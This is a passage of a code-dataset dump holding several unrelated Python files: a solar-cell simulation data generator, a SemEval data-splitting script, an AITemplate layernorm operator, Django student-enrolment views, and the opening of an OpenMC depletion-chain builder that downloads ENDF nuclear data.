= dpv.simulate(des,ls) \r\n except:\r\n c=c+1\r\n continue\r\n else:\r\n \r\n voltage = results[\"iv\"][0]\r\n current = results[\"iv\"][1]\r\n current = (10**3)*current #mA/cm^2\r\n effeciency = results[\"eff\"]\r\n \r\n \r\n \r\n current_.append(float(current[0]))\r\n voltage_.append(float(voltage[-1]))\r\n effeciency_.append(float(effeciency))\r\n Chi_HTM_.append(float(Chi_HTM))\r\n Eg_HTM_.append(float(Eg_HTM))\r\n eps_HTM_.append(float(eps_HTM))\r\n Nc_HTM_.append(float(Nc_HTM))\r\n Nv_HTM_.append(float(Nv_HTM))\r\n mn_HTM_.append(float(mn_HTM))\r\n mp_HTM_.append(float(mp_HTM))\r\n tn_HTM_.append(float(tn_HTM))\r\n tp_HTM_.append(float(tp_HTM))\r\n A_HTM_.append(float(A_HTM))\r\n thickness_HTM_.append(float(thickness_HTM))\r\n numacceptor_.append(float(numacceptor))\r\n \r\n \r\n Chi_ETM_.append(float(Chi_ETM))\r\n Eg_ETM_.append(float(Eg_ETM))\r\n eps_ETM_.append(float(eps_ETM))\r\n Nc_ETM_.append(float(Nc_ETM))\r\n Nv_ETM_.append(float(Nv_ETM))\r\n mn_ETM_.append(float(mn_ETM))\r\n mp_ETM_.append(float(mp_ETM))\r\n tn_ETM_.append(float(tn_ETM))\r\n tp_ETM_.append(float(tp_ETM))\r\n A_ETM_.append(float(A_ETM))\r\n thickness_ETM_.append(float(thickness_ETM))\r\n num_donor_.append(float(num_donor)) \r\n \r\n Chi_absorber_.append(float(Chi_absorber))\r\n Eg_Absorber_.append(float(Eg_Absorber))\r\n eps_absorber_.append(float(eps_absorber))\r\n Nc_absorber_.append(float(Nc_absorber))\r\n Nv_absorber_.append(float(Nv_absorber))\r\n mn_absorber_.append(float(mn_absorber))\r\n mp_absorber_.append(float(mp_absorber))\r\n tn_absorber_.append(float(tn_absorber))\r\n tp_absorber_.append(float(tp_absorber))\r\n A_absorber_.append(float(A_absorber))\r\n thickness_absorber_.append(float(thickness_absorber))\r\n \r\n c =c+1\r\n r=r+1\r\n if r==10000 :\r\n break\r\n \r\n \r\ndata = pd.DataFrame({\r\n\r\n \r\n 'Chi_HTM_' : (Chi_HTM_),\r\n 'Eg_HTM_' : (Eg_HTM_),\r\n 'eps_HTM_': (eps_HTM_),\r\n 'Nc_HTM_': (Nc_HTM_),\r\n 'Nv_HTM_': (Nv_HTM_),\r\n 'mn_HTM_': (Nv_HTM_),\r\n 'mp_HTM_': (mp_HTM_),\r\n 'tn_HTM_': (tn_HTM_),\r\n 'tp_HTM_': (tp_HTM_),\r\n 'A_HTM_': (A_HTM_),\r\n 'thickness_HTM_': (thickness_HTM_),\r\n 'numacceprot_' : (numacceptor_),\r\n \r\n 'Chi_ETM_' : (Chi_ETM_),\r\n 'Eg_ETM_' : (Eg_ETM_),\r\n 'eps_ETM_': (eps_ETM_),\r\n 'Nc_ETM_': (Nc_ETM_),\r\n 'Nv_ETM_': (Nv_ETM_),\r\n 'mn_ETM_': (Nv_ETM_),\r\n 'mp_ETM_': (mp_ETM_),\r\n 'tn_ETM_': (tn_ETM_),\r\n 'tp_ETM_': (tp_ETM_),\r\n 'A_ETM_': (A_ETM_),\r\n 'thickness_ETM_': (thickness_ETM_),\r\n 'num_donor_' : (num_donor_),\r\n \r\n 'Chi_absorber_' : (Chi_absorber_),\r\n 'Eg_absorber_' : (Eg_Absorber_),\r\n 'eps_absorber_': (eps_absorber_),\r\n 'Nc_absorber_': (Nc_absorber_),\r\n 'Nv_absorber_': (Nv_absorber_),\r\n 'mn_absorber_': (Nv_absorber_),\r\n 'mp_absorber_': (mp_absorber_),\r\n 'tn_absorber_': (tn_absorber_),\r\n 'tp_absorber_': (tp_absorber_),\r\n 'A_absorber_': (A_absorber_),\r\n 'thickness_absorber_' : (thickness_absorber_),\r\n \r\n \r\n 'OCvoltage' : (voltage_),\r\n 'SCcurrent' : (current_),\r\n 'effeciency' : (effeciency_)\r\n \r\n\r\n\r\n })\r\ndata.to_excel(\"___10000datapoints.xlsx\")\r\n\r\n\r\n \r\n\r\n\r\n","repo_name":"ALBURAYHKARIM/usage-of-Machine-learning-to-maximizing-the-efficiency-of-solar-cells","sub_path":"code/SolarSimulationSimulator3.py","file_name":"SolarSimulationSimulator3.py","file_ext":"py","file_size_in_byte":15431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32357123684","text":"import pandas as pd\nimport numpy as np\n\nif __name__ == '__main__':\n train_ids_file = '../data/splits/train_semeval_parids-labels.csv'\n val_ids_file = '../data/splits/dev_semeval_parids-labels.csv'\n\n # columns = [par_id, label]\n train_ids = pd.read_csv(train_ids_file)\n train_ids = train_ids.rename(columns={'label': 'label_in_split_file'})\n val_ids = pd.read_csv(val_ids_file)\n val_ids = val_ids.rename(columns={'label': 'label_in_split_file'})\n print(f'Number of train samples: {len(train_ids)}')\n print(f'Number of val samples: {len(val_ids)}')\n #print(train_ids.columns)\n #print(val_ids.columns)\n\n task1_data_file = '../data/full_baseline/task1.csv'\n task2_data_file = '../data/full_baseline/task2.csv'\n #task2_data_file = '../raw_data/task2_ner_tags_updated.csv'\n\n task1_df = pd.read_csv(task1_data_file)\n task2_df = pd.read_csv(task2_data_file)\n print(f'Number of task 1 samples: {len(task1_df)}')\n print(f'Number of task 2 samples: {len(task2_df)}')\n #print(task1_df.columns)\n #print(task2_df.columns)\n\n task1_train = pd.merge(task1_df, train_ids, how='right', on='par_id')\n task1_val = pd.merge(task1_df, val_ids, how='right', on='par_id')\n print(f'Number of task 1 train: {len(task1_train)}')\n print(f'Number of task 1 val: {len(task1_val)}')\n assert len(task1_train) + len(task1_val) == len(task1_df)\n #print(task1_train.head())\n assert np.sum(task1_train['label'].isnull()) == 0\n assert np.sum(task1_val['label'].isnull()) == 0\n\n task1_train.to_csv('../data/split_baseline/task1_train.csv', index=False)\n task1_val.to_csv('../data/split_baseline/task1_val.csv', index=False)\n\n task2_train = pd.merge(task2_df, train_ids, how='inner', on='par_id')\n task2_val = pd.merge(task2_df, val_ids, how='inner', on='par_id')\n print(f'Number of task 2 train: {len(task2_train)}')\n print(f'Number of task 2 val: {len(task2_val)}')\n\n assert len(task2_train) + len(task2_val) == len(task2_df)\n\n #assert np.sum(task2_train['label'].isnull()) + np.sum(task2_val['label'].isnull()) == np.sum(task1_df['label'] == 0)\n\n task2_train.to_csv('../data/split_baseline/task2_train.csv', index=False)\n task2_val.to_csv('../data/split_baseline/task2_val.csv', index=False)\n #task2_train.to_csv('../data/split_ner/task2_train.csv', index=False)\n #task2_val.to_csv('../data/split_ner/task2_val.csv', index=False)\n\n # create toy examples for model development\n # Task 1: select 50 samples for each class\n task1_toy_df = task1_train.groupby('label').sample(n=50, random_state=1)\n # Task 2: select 100 samples in total, regardless of labels\n task2_toy_df = task2_train.sample(n=100, random_state=1)\n\n task1_toy_df.to_csv('../data/new_toy_baseline/task1.csv')\n task2_toy_df.to_csv('../data/new_toy_baseline/task2.csv')\n\n\n","repo_name":"karenacorn99/PCL_detection","sub_path":"code/create_train_val_splits.py","file_name":"create_train_val_splits.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818353010","text":"import logging\nimport os\nimport re\nfrom collections import OrderedDict\nfrom hashlib import sha1\nfrom operator import itemgetter\nfrom typing import Any, List, Union\n\nimport jinja2\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.backend.target import Target\nfrom aitemplate.compiler.base import (\n DynamicProfileStrategy,\n ExecItem,\n IntImm,\n IntVar,\n Operator,\n Tensor,\n)\nfrom aitemplate.compiler.ops.softmax.cache_entry import NormQueryEntry, NormRecordEntry\nfrom aitemplate.compiler.tensor_accessor import TensorAccessor\n\nfrom aitemplate.testing import detect_target\nfrom aitemplate.utils import shape_utils\n\n# pylint: disable=C0103,W0221,W0102,W0223\n\n\n_LOGGER = logging.getLogger(__name__)\n\nEXEC_COND_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}if ({{cond}}) {\n{{indent}} {{program}}\n{{indent}}}\n\"\"\"\n)\n\n\nclass layernorm(Operator):\n \"\"\"Standalone layernorm op.\n Applies Layer Normalization over a mini-batch of inputs as described in the\n paper Layer Normalization. The mean and standard-deviation are calculated\n over the last D dimensions, where D is the dimension of normalized_shape.\n Input shape: [M0, M1, ..., Mp, N1, N2, ..., ND]\n Normalized_shape: [N1, N2, ..., ND]\n Gamma/Beta, if not None, have the same shape as normalized_shape.\n \"\"\"\n\n def __init__(self, normalized_shape: List[IntImm] = None) -> None:\n super().__init__()\n self._attrs[\"op\"] = \"layernorm\"\n self._attrs[\"has_profiler\"] = False\n if detect_target().name() == \"rocm\":\n self._attrs[\"has_profiler\"] = True\n self._attrs[\"default_normalized_shape\"] = normalized_shape\n self._attrs[\"normalized_shape\"] = []\n\n @staticmethod\n def check_shapes(x_shapes, gamma_shapes, beta_shapes, normalized_shape):\n if len(normalized_shape) >= len(x_shapes):\n raise NotImplementedError(\n f\"Layernorm normalized_shape length must be smaller than the input.\"\n f\"Current normalized_shape: {normalized_shape}, input shape: {x_shapes}\"\n )\n\n def _check_param_shapes(x_shapes, param_shapes, param_name):\n if param_name != \"normalized\" and not param_shapes:\n return\n for shape in param_shapes:\n if not isinstance(shape, IntImm):\n raise NotImplementedError(\n f\"Layernorm {param_name} shape must be immutable values.\"\n f\"Current value: {param_shapes}\"\n )\n\n batch_ndims = len(x_shapes) - len(param_shapes)\n for i in range(len(param_shapes)):\n if param_shapes[i].value() != x_shapes[batch_ndims + i].value():\n raise RuntimeError(\n f\"Layernorm {param_name} shape is not compatible with input shape. \"\n f\"{param_name} shape: {param_shapes}, input shape: {x_shapes}\"\n )\n\n _check_param_shapes(x_shapes, gamma_shapes, \"gamma\")\n _check_param_shapes(x_shapes, beta_shapes, \"beta\")\n _check_param_shapes(x_shapes, normalized_shape, \"normalized\")\n\n @staticmethod\n def get_input_shapes(x, gamma, beta) -> List[List[Union[IntVar, IntImm]]]:\n \"\"\"\n Return a list of shapes for x, gamma and beta, where gamma_shape and\n beta_shape may be None if gamma and beta are None, respectively.\n \"\"\"\n x_shape = x._attrs[\"shape\"]\n # gamma and beta can be None.\n gamma_shape = None\n if gamma is not None:\n gamma_shape = gamma._attrs[\"shape\"]\n beta_shape = None\n if beta is not None:\n beta_shape = beta._attrs[\"shape\"]\n return [x_shape, gamma_shape, beta_shape]\n\n def _sanity_check(self, x, gamma, beta):\n normalized_shape = self._attrs[\"normalized_shape\"]\n\n # size() op can introduce up to 1 more input per normalized dim\n input_len = len(self._attrs[\"inputs\"])\n max_input_len = 3 + len(normalized_shape)\n if input_len < 1 or input_len > max_input_len:\n raise NotImplementedError(\n f\"Expect 1 ~ {max_input_len} inputs for Layernorm. Actual #inputs: {input_len}\"\n )\n (x_shape, gamma_shape, beta_shape) = layernorm.get_input_shapes(x, gamma, beta)\n\n expected_dtype = x.dtype()\n for (param, name) in ((gamma, \"gamma\"), (beta, \"beta\")):\n if param is not None and param.dtype() != expected_dtype:\n raise NotImplementedError(\n f\"Layernorm doesn't support type promotions; expected {expected_dtype} but got {name} with dtype {param.dtype()}\"\n )\n\n layernorm.check_shapes(x_shape, gamma_shape, beta_shape, normalized_shape)\n\n def _infer_shapes(self, x: Tensor):\n \"\"\"Infer shapes for layernorm.\"\"\"\n\n return x._attrs[\"shape\"]\n\n def __call__(\n self,\n x: Tensor,\n gamma: Tensor = None,\n beta: Tensor = None,\n normalized_shape: List[Any] = None,\n eps: float = 1e-5,\n ) -> Tensor:\n inputs = [x]\n self._attrs[\"gamma_constant\"] = \"1.0\"\n self._attrs[\"beta_constant\"] = \"0.0\"\n if gamma is not None:\n self._attrs[\"gamma_constant\"] = None\n inputs.append(gamma)\n if beta is not None:\n self._attrs[\"beta_constant\"] = None\n inputs.append(beta)\n if normalized_shape is not None:\n new_norm_shape = shape_utils.convert_shape_to_IntVar(normalized_shape)\n # Only add source of dynamic dim to inputs\n for old_shape, new_shape in zip(normalized_shape, new_norm_shape):\n if not isinstance(new_shape, IntImm):\n inputs.append(old_shape)\n self._attrs[\"normalized_shape\"] = new_norm_shape\n else:\n self._attrs[\"normalized_shape\"] = self._attrs[\"default_normalized_shape\"]\n assert isinstance(eps, float), f\"eps must be float, instead it is {type(eps)}\"\n self._attrs[\"eps\"] = eps\n self._attrs[\"inputs\"] = inputs\n self._attrs[\"input_accessors\"] = [TensorAccessor(x)]\n self._sanity_check(x, gamma, beta)\n self._set_depth()\n output_shape = self._infer_shapes(x)\n output = Tensor(output_shape, src_ops={self}, dtype=x.dtype())\n self._attrs[\"outputs\"] = [output]\n self._attrs[\"output_accessors\"] = [TensorAccessor(output)]\n return output\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n func_key = \"{target}.{op}.gen_function\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n self._attrs[\"exec_cond_template\"] = EXEC_COND_TEMPLATE\n func = registry.get(func_key)\n return func(self._attrs)\n\n def _invert_exec_key(self, key):\n \"\"\"Invert execution key to get input arguments as integers.\n\n Parameters\n ----------\n key : str\n Execution key\n\n Returns\n ----------\n List[int]\n \"\"\"\n res = []\n for item in re.split(\" == | && \", key):\n if item.isnumeric():\n res.append(int(item))\n return res\n\n def _gen_exec_key(self, name_value_mapping):\n \"\"\"Generate execution key from the name value mapping.\n\n Parameters\n ----------\n name_value_mapping : Dict[str, Union[int, List[int]]\n Dict for name and value.\n\n Returns\n ----------\n str\n \"\"\"\n key_strs = []\n for name, values in name_value_mapping.items():\n if len(values) == 1:\n key_strs.append(f\"{name} == {values[0]}\")\n elif len(values) > 1:\n key_strs.append(f\"{name} >= {values[0]} && {name} <= {values[-1]}\")\n else:\n raise RuntimeError(\n \"Softmax input has empty dim values: {}\".format(values)\n )\n return \" && \".join(key_strs)\n\n def _extract_exec_path(self, dynamic_profiling_strategy=DynamicProfileStrategy.MAX):\n \"\"\"Extract execution key, i.e. input arguments for the profiler.\n\n Parameters\n ----------\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy. By default MAX is used, i.e. to profile\n a dynamic range, an upper bound will be used.\n \"\"\"\n assert (\n len(self._attrs[\"normalized_shape\"]) == 1\n ), \"For profiling, normalized_shape must be 1D\"\n\n m_max = 1\n m_min = 1\n for dim in self._attrs[\"inputs\"][0]._attrs[\"shape\"][:-1]:\n m_max *= max(dim._attrs[\"values\"])\n m_min *= min(dim._attrs[\"values\"])\n\n n = self._attrs[\"inputs\"][0]._attrs[\"shape\"][-1].value()\n\n shape_values_dict = {\n \"M\": [m_min, m_max],\n \"N\": [n],\n }\n\n self._attrs[\"exec_path\"] = OrderedDict()\n if dynamic_profiling_strategy == DynamicProfileStrategy.MAX:\n max_values = {\"M\": [m_max], \"N\": [n]}\n\n exec_item = ExecItem(\n profiling_key=self._gen_exec_key(max_values),\n exec_cond=self._gen_exec_key(shape_values_dict),\n algo=\"\",\n )\n self._attrs[\"exec_path\"][exec_item.profiling_key] = exec_item\n elif dynamic_profiling_strategy == DynamicProfileStrategy.MIN:\n min_values = {\"M\": [m_min], \"N\": [n]}\n exec_item = ExecItem(\n profiling_key=self._gen_exec_key(min_values),\n exec_cond=self._gen_exec_key(shape_values_dict),\n algo=\"\",\n )\n self._attrs[\"exec_path\"][exec_item.profiling_key] = exec_item\n\n def _gen_profile_cmd(self, profiler_prefix, cfg, x_shape):\n \"\"\"Generate profiler command.\n\n Parameters\n ----------\n profiler_prefix : str\n Directory to store profiler.\n cfg: str\n The filename generated for profiler.\n x_shape : List[int]\n Input shapes for the profiler.\n \"\"\"\n exe_path = os.path.join(profiler_prefix, cfg)\n if not os.access(exe_path, os.X_OK):\n raise RuntimeError(\"Profiler %s is not executable\" % exe_path)\n cmd = [exe_path]\n for shape in x_shape:\n cmd.append(shape)\n command = [str(x) for x in cmd]\n return command\n\n def _profile_single_workload(self, profiler_prefix, exec_key, devices):\n \"\"\"Profile a single workload.\n\n Parameters\n ----------\n profiler_prefix : str\n Base dir to keep profiling source codes.\n exec_key: str\n Input arguments to profiler executables.\n devices: List[int]\n GPU device ids used for profiling.\n \"\"\"\n target = backend.target.Target.current()\n # if in CI just choose minimal configs\n # workspace is a hack just provides 102400 Byte\n # query cache\n tmp_key = next(iter(self._attrs[\"op_instance\"].keys()))\n tmp_op = self._attrs[\"op_instance\"][tmp_key]\n exec_entry_sha1 = sha1(exec_key.encode(\"utf-8\")).hexdigest()\n query = NormQueryEntry(\n dtype_in=tmp_op.In.value,\n dtype_acc=tmp_op.accumulator_type().value,\n dtype_out=tmp_op.Out.value,\n rank=tmp_op.Rank,\n op_type=self._attrs[\"op\"],\n device=target._arch,\n exec_entry_sha1=exec_entry_sha1,\n )\n cache_value = target.query_profile_cache(\"normalization\", query.__dict__)\n if cache_value is not None and not target.force_profile():\n _LOGGER.info(\"Load profiling result from cache.\")\n return cache_value\n\n content = list(self._attrs[\"op_instance\"].keys())\n runner = backend.profiler_runner.Runner(devices, self._attrs[\"name\"])\n x_shape = self._invert_exec_key(exec_key)\n for cfg in content:\n command = self._gen_profile_cmd(profiler_prefix, cfg, x_shape)\n runner.push(cfg, command)\n\n runner.join()\n result = runner.pull()\n\n if len(result) == 0:\n raise RuntimeError(\n \"Profile workload: \" f\"{exec_key}\" \" failed. \" f\"Results: {result}.\"\n )\n\n out = min(result, key=itemgetter(1))\n best_algo = out[0]\n workspace = out[1].workspace\n ## cache\n cache_record = NormRecordEntry(\n exec_entry=exec_key,\n exec_entry_sha1=exec_entry_sha1,\n dtype_in=tmp_op.In.value,\n dtype_acc=tmp_op.accumulator_type().value,\n dtype_out=tmp_op.Out.value,\n rank=tmp_op.Rank,\n op_type=self._attrs[\"op\"],\n device=target._arch,\n algo=best_algo,\n workspace=workspace,\n )\n Target.current().insert_profile_cache(\"normalization\", cache_record.__dict__)\n return (best_algo, workspace)\n\n def profile(\n self,\n workdir=\"./\",\n devices=None,\n dynamic_profiling_strategy=DynamicProfileStrategy.MAX,\n ):\n \"\"\"Selects the fastest kernel configurations.\n\n Parameters\n ----------\n workdir : str, optional\n Base dir to keep profiling source codes, by default \"./\"\n devices: list, optional\n Devices used for profiling, by default device 0 will be used.\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy. By default MAX is used, i.e. to profile\n a dynamic range, an upper bound will be used.\n \"\"\"\n\n if devices is None:\n devices = [0]\n\n self._extract_exec_path(dynamic_profiling_strategy)\n\n workloads = list(self._attrs[\"exec_path\"].keys())\n profiler_prefix = os.path.join(workdir, \"profiler\", self._attrs[\"op\"])\n if \"op_instance\" not in self._attrs:\n target = backend.target.Target.current()\n # init candidate ops\n func_key = \"{target}.{op}.config\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n func(self._attrs)\n\n for wkl in workloads:\n _LOGGER.info(\n \"Profile: {name}: {wkl}\".format(name=self._attrs[\"name\"], wkl=wkl),\n )\n best_algo, workspace = self._profile_single_workload(\n profiler_prefix, wkl, devices\n )\n self._attrs[\"exec_path\"][wkl].algo = best_algo\n self._attrs[\"workspace\"] = workspace\n\n def gen_profiler(\n self,\n workdir: str = None,\n dynamic_profiling_strategy=DynamicProfileStrategy.HINTS,\n ) -> None:\n \"\"\"Generator profiler. The profiler files are standalone executable for profiling.\n\n Parameters\n ----------\n workdir : str, optional\n Base dir to keep profiling source codes, by default \"./\"\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy, used to filter generated profiles at compile time.\n See also: :func:`~aitemplate.compiler.transform.profile.profile`\n \"\"\"\n target = Target.current()\n # init candidate ops\n func_key = \"{target}.{op}.config\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n func(self._attrs)\n func_key = \"{target}.{op}.gen_profiler\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n return func(self._attrs, workdir)\n\n def _get_op_attributes(self):\n return {\"normalized_shape\": self._attrs[\"default_normalized_shape\"]}\n\n def _args_for_pseudo_code(self):\n return [\n f\"normalized_shape={[s.symbolic_value() for s in self._attrs['normalized_shape']]}\"\n ]\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/layernorm/layernorm.py","file_name":"layernorm.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"11687736590","text":"from django.shortcuts import render,redirect\nfrom .forms import Form_Crear, Form_Materia, Form_Modificar_A, Form_Modificar_M\nfrom .models import Alumno, Materia\nfrom django.contrib import messages\n# Create your views here.\n\n\ndef listar(request):\n\tmateria = Materia.objects.all()\n\talumno = Alumno.objects.all()\n\tcontext = {\n\t\t'alumno':alumno,\n\t\t'materia':materia,\n\t}\n\n\treturn render(request,'listar.html',context)\n\ndef crear_alumno(request):\n\tf = Form_Crear(request.POST or None)\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\n\tif f.is_valid():\n\t\tdatos_form = f.cleaned_data\n\t\talumno = Alumno()\n\t\talumno.nombre = datos_form.get(\"nombre\")\n\t\talumno.apellido = datos_form.get(\"apellido\")\n\t\talumno.cedula = datos_form.get(\"cedula\")\n\t\talumno.telefono = datos_form.get(\"telefono\")\n\t\talumno.correo \t = datos_form.get(\"correo\")\n\t\talumno.direccion = datos_form.get(\"direccion\")\n\t\talumno.save()\n\n\t\tif(alumno.save() != True):\n\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha podido crear el Alumno\", fail_silently=True)\n\t\telse:\t\n\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha creado un nuevo Alumno\", fail_silently=True)\n\t\treturn redirect('/matricula')\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\treturn render(request,'crear_alumno.html',context)\n\ndef crear_materias(request):\n\tf = Form_Materia(request.POST or None)\n\tcontext = {\n\t\t\"form\":f,\n\t}\n\n\tif f.is_valid():\n\t\tdatos_form \t\t\t\t= f.cleaned_data\n\t\tmateria \t\t\t\t= Materia()\n\t\tmateria.nombre \t\t\t= datos_form.get(\"nombre\")\n\t\tmateria.horas \t\t\t= datos_form.get(\"horas\")\n\t\tmateria.creditos \t\t= datos_form.get(\"creditos\")\n\t\tmateria.numcupos \t\t= datos_form.get(\"numcupos\")\n\t\tmateria.num_Estudiantes = datos_form.get(\"num_Estudiantes\")\n\t\tmateria.save()\n\n\t\tif(materia.save() != True):\n\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha podido crear la Materia\", fail_silently=True)\n\t\telse:\t\n\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha creado una nueva Materia\", fail_silently=True)\n\t\treturn redirect('/matricula')\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\treturn render(request,'crear_materia.html',context)\n\ndef eliminar_alumno(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tcontext = {\n\t\t'alumno':alumno,\n\t}\n\treturn render(request,'eliminar_alumno.html',context)\n\ndef confirmacion_eliminar(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tif (alumno.delete()):\n\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha eliminado el alumno\", fail_silently=True)\n\telse: \n\t\tmessages.add_message(request, messages.ERROR, \"No se ha eliminado el alumno\", fail_silently=True)\n\treturn redirect(listar)\n\ndef modificar_alumno(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tf = Form_Modificar_A(request.POST or None)\n\tcontext = {\n\t\t'alumno':alumno,\n\t\t'form':f,\n\t}\n\tf.fields['nombre'].initial\t = alumno.nombre\n\tf.fields['apellido'].initial = alumno.apellido\n\tf.fields['cedula'].initial \t = alumno.cedula\n\tf.fields['telefono'].initial = alumno.telefono\n\tf.fields['correo'].initial \t = alumno.correo\n\tf.fields['direccion'].initial= alumno.direccion\n\n\tif request.method == 'POST':\n\t\tif f.is_valid():\n\t\t\tf_data = f.cleaned_data\n\t\t\talumno.nombre \t= f_data.get('nombre')\n\t\t\talumno.apellido = f_data.get('apellido')\n\t\t\talumno.cedula \t= f_data.get('cedula')\n\t\t\talumno.telefono = f_data.get('telefono')\n\t\t\talumno.correo\t= f_data.get('correo')\n\t\t\talumno.direccion= f_data.get('direccion')\n\t\t\tif (alumno.save()):\n\t\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha modificado el alumno\", fail_silently=True)\n\t\t\telse:\t\n\t\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha modificado el alumno\", fail_silently=True)\n\t\t\treturn redirect(listar)\n\n\treturn render(request,'modificar_alumno.html',context)\n\ndef eliminar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tcontext = {\n\t\t'materia':materia,\n\t}\n\treturn render(request,'eliminar_materia.html',context)\n\ndef confirmacion_eliminar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tif (materia.delete()):\n\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha eliminado la materia\", fail_silently=True)\n\telse: \n\t\tmessages.add_message(request, messages.ERROR, \"No se ha eliminado la materia\", fail_silently=True)\n\treturn redirect(listar)\n\ndef modificar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tf = Form_Modificar_M(request.POST or None)\n\tcontext = {\n\t\t'materia':materia,\n\t\t'form':f,\n\t}\n\tf.fields['nombre'].initial\t \t\t= materia.nombre\n\tf.fields['horas'].initial \t\t\t= materia.horas\n\tf.fields['creditos'].initial \t\t= materia.creditos\n\tf.fields['numcupos'].initial \t\t= materia.numcupos\n\tf.fields['num_Estudiantes'].initial = materia.num_Estudiantes\n\n\tif request.method == 'POST':\n\t\tif f.is_valid():\n\t\t\tf_data = f.cleaned_data\n\t\t\tmateria.nombre \t\t\t= f_data.get('nombre')\n\t\t\tmateria.horas \t\t\t= f_data.get('horas')\n\t\t\tmateria.creditos \t\t= f_data.get('creditos')\n\t\t\tmateria.numcupos \t\t= f_data.get('numcupos')\n\t\t\tmateria.num_Estudiantes\t= f_data.get('num_Estudiantes')\n\t\t\tif (materia.save()):\n\t\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha modificado el materia\", fail_silently=True)\n\t\t\telse:\t\n\t\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha modificado el materia\", fail_silently=True)\n\t\t\treturn redirect(listar)\n\n\treturn render(request,'modificar_materia.html',context)\n\n","repo_name":"npmcdn-to-unpkg-bot/Practica_matricula","sub_path":"repaso/matricula/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75005402407","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nfrom zipfile import ZipFile\nfrom collections import OrderedDict, defaultdict\nfrom io import StringIO\nfrom itertools import chain\n\ntry:\n import lxml.etree as ET\n _have_lxml = True\nexcept ImportError:\n import xml.etree.ElementTree as ET\n _have_lxml = False\n\nimport openmc.data\nimport openmc.deplete\nfrom openmc._xml import clean_indentation\nfrom openmc.deplete.chain import REACTIONS, replace_missing_fpy\nfrom openmc.deplete.nuclide import Nuclide, DecayTuple, ReactionTuple, \\\n FissionYieldDistribution\n\nfrom casl_chain import CASL_CHAIN, UNMODIFIED_DECAY_BR\nfrom utils import download\n\nURLS = [\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-neutrons.zip',\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-decay.zip',\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-nfy.zip'\n]\n\n\ndef replace_missing_decay_product(product, decay_data, all_decay_data):\n # Determine atomic number, mass number, and metastable state\n Z, A, state = openmc.data.zam(product)\n symbol = openmc.data.ATOMIC_SYMBOL[Z]\n\n # Iterate until we find an existing nuclide in the chain\n while product not in decay_data:\n # If product has no decay data in the library, nothing further can be done\n if product not in all_decay_data:\n product = None\n break\n\n # If the current product is not in the chain but is stable, there's\n # nothing further we can do. Also, we only want to continue down the\n # decay chain if the half-life is short, so we also make a cutoff here\n # to terminate if the half-life is more than 1 day.\n decay_obj = all_decay_data[product]\n if decay_obj.nuclide['stable'] or decay_obj.half_life.n > 24*60*60:\n product = None\n break\n\n dominant_mode = max(decay_obj.modes, key=lambda x: x.branching_ratio)\n product = dominant_mode.daughter\n\n return product\n\n\ndef main():\n if os.path.isdir('./decay') and os.path.isdir('./nfy') and os.path.isdir('./neutrons'):\n endf_dir = '.'\n elif 'OPENMC_ENDF_DATA' in os.environ:\n endf_dir = os.environ['OPENMC_ENDF_DATA']\n else:\n for url in URLS:\n basename = download(url)\n with ZipFile(basename, 'r') as zf:\n print('Extracting {}...'.format(basename))\n zf.extractall()\n endf_dir = '.'\n\n decay_files = glob.glob(os.path.join(endf_dir, 'decay', '*.endf'))\n fpy_files = glob.glob(os.path.join(endf_dir, 'nfy', '*.endf'))\n neutron_files = glob.glob(os.path.join(endf_dir, 'neutrons', '*.endf'))\n\n # Create a Chain\n chain = openmc.deplete.Chain()\n\n print('Reading ENDF nuclear data from \"{}\"...'.format(os.path.abspath(endf_dir)))\n\n # Create dictionary mapping target to filename\n print('Processing neutron sub-library files...')\n reactions = {}\n for f in neutron_files:\n evaluation = openmc.data.endf.Evaluation(f)\n nuc_name = evaluation.gnd_name\n if nuc_name in CASL_CHAIN:\n reactions[nuc_name] = {}\n for mf, mt, nc, mod in evaluation.reaction_list:\n # Q value for each reaction is given in MF=3\n if mf 